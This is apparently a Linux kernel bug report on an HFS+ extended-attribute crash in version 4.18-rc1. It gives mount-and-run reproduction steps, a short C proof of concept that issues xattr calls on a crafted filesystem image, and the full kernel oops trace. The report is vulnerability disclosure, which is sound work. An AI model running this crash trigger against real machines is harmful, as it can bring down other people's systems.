Created attachment 276897 [details] The (compressed) crafted image which causes crash - Reproduce # mkdir mnt # mount -t hfsplus 5.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *xattr; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&xattr, "%s/foo/bar/xattr", mpoint); // xattr char buf2[113]; memset(buf2, 0, sizeof(buf2)); listxattr(xattr, buf2, sizeof(buf2)); removexattr(xattr, "user.mime_type"); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_CREATE); setxattr(xattr, "user.md5", buf2, sizeof(buf2), XATTR_REPLACE); } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 172.954208] ------------[ cut here ]------------ [ 172.954215] kernel BUG at fs/hfsplus/xattr.c:181! [ 172.955390] invalid opcode: 0000 [#1] SMP KASAN PTI [ 172.956718] CPU: 1 PID: 1415 Comm: a.out Not tainted 4.18.0-rc1+ #6 [ 172.958053] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 172.960077] RIP: 0010:__hfsplus_setxattr+0x1086/0x1160 [ 172.961143] Code: e8 af 0c de ff 4c 8b 85 08 fd ff ff 41 c7 40 38 00 00 00 00 e9 7b f1 ff ff 48 c7 c7 00 40 96 ae e8 93 42 bb ff e9 1a f5 ff ff <0f> 0b 4c 8b 85 b0 fc ff ff 48 8b bd d8 fc ff ff be 04 00 00 00 4c [ 172.965030] RSP: 0018:ffff8801eb687788 EFLAGS: 00010206 [ 172.966117] RAX: 0000000000000000 RBX: ffff8801eebb4908 RCX: ffffffffad5bc134 [ 172.967574] RDX: dffffc0000000000 RSI: ffff8801eebb4da8 RDI: ffff8801eebb4d58 [ 172.969041] RBP: ffff8801eb687b08 R08: ffff8801e288c000 R09: ffffed003dd769b3 [ 172.970499] R10: 0000000000000001 R11: ffffed003dd769b2 R12: ffff8801ec198000 [ 172.971967] R13: ffff8801eebb4d08 R14: ffff8801e21a0540 R15: ffff8801eb687ae0 [ 172.973423] FS: 00007fe64916a700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 172.975069] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 172.976262] CR2: 000000000129c008 CR3: 00000001e5e58000 CR4: 00000000000006e0 [ 172.977729] Call Trace: [ 172.978296] ? unwind_get_return_address+0x36/0x50 [ 172.979330] ? kasan_check_write+0x14/0x20 [ 172.980232] ? _raw_spin_lock_irqsave+0x2a/0x60 [ 172.981181] ? hfsplus_getxattr_finder_info.isra.5+0x280/0x280 [ 172.982394] ? save_stack+0x46/0xd0 [ 172.983133] ? kasan_kmalloc+0xad/0xe0 [ 172.983941] ? kmem_cache_alloc_trace+0x102/0x200 [ 172.984927] ? hfsplus_setxattr+0x4c/0xb0 [ 172.985770] ? hfsplus_user_setxattr+0x27/0x30 [ 172.986716] ? __vfs_setxattr+0x7c/0xa0 [ 172.987522] ? __vfs_setxattr_noperm+0x8d/0x200 [ 172.988478] ? vfs_setxattr+0xb3/0xc0 [ 172.989248] ? setxattr+0x1b3/0x260 [ 172.989982] ? path_setxattr+0x134/0x170 [ 172.990811] ? __x64_sys_setxattr+0x6d/0x80 [ 172.991700] ? do_syscall_64+0x78/0x170 [ 172.992519] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 172.993602] ? save_stack+0xb5/0xd0 [ 172.994339] ? save_stack+0x46/0xd0 [ 172.995077] ? kasan_kmalloc+0xad/0xe0 [ 172.995878] ? __kmalloc_node+0x11e/0x2e0 [ 172.996738] ? kvmalloc_node+0x31/0x80 [ 172.997527] ? setxattr+0x114/0x260 [ 172.998261] ? path_setxattr+0x134/0x170 [ 172.999085] ? __x64_sys_setxattr+0x6d/0x80 [ 172.999973] ? do_syscall_64+0x78/0x170 [ 173.000782] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 173.001870] ? save_stack+0xb5/0xd0 [ 173.002610] ? save_stack+0x46/0xd0 [ 173.003349] ? __kasan_slab_free+0x13c/0x1a0 [ 173.004257] ? kasan_slab_free+0xe/0x10 [ 173.005079] ? kmem_cache_free+0x89/0x1e0 [ 173.005929] ? putname+0x80/0x90 [ 173.006610] ? filename_lookup+0x191/0x280 [ 173.007465] ? kasan_unpoison_shadow+0x36/0x50 [ 173.008407] ? kasan_kmalloc+0xad/0xe0 [ 173.009201] ? kmem_cache_alloc_trace+0x102/0x200 [ 173.010183] hfsplus_setxattr+0x8a/0xb0 [ 173.010992] hfsplus_user_setxattr+0x27/0x30 [ 173.011899] __vfs_setxattr+0x7c/0xa0 [ 173.012675] __vfs_setxattr_noperm+0x8d/0x200 [ 173.013588] vfs_setxattr+0xb3/0xc0 [ 173.014326] setxattr+0x1b3/0x260 [ 173.015031] ? vfs_setxattr+0xc0/0xc0 [ 173.022586] ? filename_lookup+0x191/0x280 [ 173.023449] ? filename_parentat+0x2b0/0x2b0 [ 173.024364] ? kasan_kmalloc+0xad/0xe0 [ 173.025157] ? kasan_check_write+0x14/0x20 [ 173.026040] ? strncpy_from_user+0xa8/0x1c0 [ 173.026923] ? __mnt_is_readonly.part.13+0x23/0x30 [ 173.027936] ? __mnt_want_write+0x9d/0xb0 [ 173.028783] path_setxattr+0x134/0x170 [ 173.029573] ? setxattr+0x260/0x260 [ 173.030317] ? vm_brk+0x20/0x20 [ 173.030986] __x64_sys_setxattr+0x6d/0x80 [ 173.031842] do_syscall_64+0x78/0x170 [ 173.032619] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 173.033695] RIP: 0033:0x7fe648c8b1fa [ 173.034443] Code: 48 8b 0d a1 dc 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 49 89 ca b8 bc 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 6e dc 2b 00 f7 d8 64 89 01 48 [ 173.038299] RSP: 002b:00007ffd5dbc6bd8 EFLAGS: 00000206 ORIG_RAX: 00000000000000bc [ 173.039843] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fe648c8b1fa [ 173.041329] RDX: 00007ffd5dbc6c00 RSI: 00000000004008a4 RDI: 000000000129c080 [ 173.042795] RBP: 00007ffd5dbc6c80 R08: 0000000000000001 R09: 0000000000000000 [ 173.044256] R10: 0000000000000071 R11: 0000000000000206 R12: 00000000004005e0 [ 173.045710] R13: 00007ffd5dbc6d80 R14: 0000000000000000 R15: 0000000000000000 [ 173.047174] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops crct10dif_pclmul ttm crc32_pclmul aesni_intel drm aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy [ 173.057207] ---[ end trace 7f5a46c7478f1295 ]--- [ 173.058199] RIP: 0010:__hfsplus_setxattr+0x1086/0x1160 [ 173.059270] Code: e8 af 0c de ff 4c 8b 85 08 fd ff ff 41 c7 40 38 00 00 00 00 e9 7b f1 ff ff 48 c7 c7 00 40 96 ae e8 93 42 bb ff e9 1a f5 ff ff <0f> 0b 4c 8b 85 b0 fc ff ff 48 8b bd d8 fc ff ff be 04 00 00 00 4c [ 173.063633] RSP: 0018:ffff8801eb687788 EFLAGS: 00010206 [ 173.065012] RAX: 0000000000000000 RBX: ffff8801eebb4908 RCX: ffffffffad5bc134 [ 173.066580] RDX: dffffc0000000000 RSI: ffff8801eebb4da8 RDI: ffff8801eebb4d58 [ 173.068219] RBP: ffff8801eb687b08 R08: ffff8801e288c000 R09: ffffed003dd769b3 [ 173.069694] R10: 0000000000000001 R11: ffffed003dd769b2 R12: ffff8801ec198000 [ 173.071151] R13: ffff8801eebb4d08 R14: ffff8801e21a0540 R15: ffff8801eb687ae0 [ 173.072671] FS: 00007fe64916a700(0000) GS:ffff8801f6f00000(0000) knlGS:0000000000000000 [ 173.074329] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 173.075505] CR2: 000000000129c008 CR3: 00000001e5e58000 CR4: 00000000000006e0 - Location https://elixir.bootlin.com/linux/v4.18-rc1/source/fs/hfsplus/xattr.c#L181 BUG_ON(i_size_read(attr_file) != 0); Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.